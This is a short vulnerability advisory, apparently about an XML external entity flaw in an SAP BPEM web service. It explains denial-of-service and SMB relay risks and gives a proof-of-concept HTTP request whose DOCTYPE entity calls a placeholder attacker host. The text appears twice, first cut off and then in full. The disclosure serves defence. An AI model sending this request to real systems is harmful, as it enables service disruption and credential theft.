1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack) 2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access. PoC ``` POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1 Content-Type: text/xml User-Agent: ERPscan Host: SAP_IP:SAP_PORT Content-Length: 480 Connection: Keep-Alive Cache-Control: no-cache Authorization: Basic ZXJwc2NhbjplcnBzY2Fu <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body> <m:isBPMSInUse...
1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack) 2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access. PoC ``` POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1 Content-Type: text/xml User-Agent: ERPscan Host: SAP_IP:SAP_PORT Content-Length: 480 Connection: Keep-Alive Cache-Control: no-cache Authorization: Basic ZXJwc2NhbjplcnBzY2Fu <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body> <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/> &xxe;</SOAP-ENV:Body> </SOAP-ENV:Envelope> ```
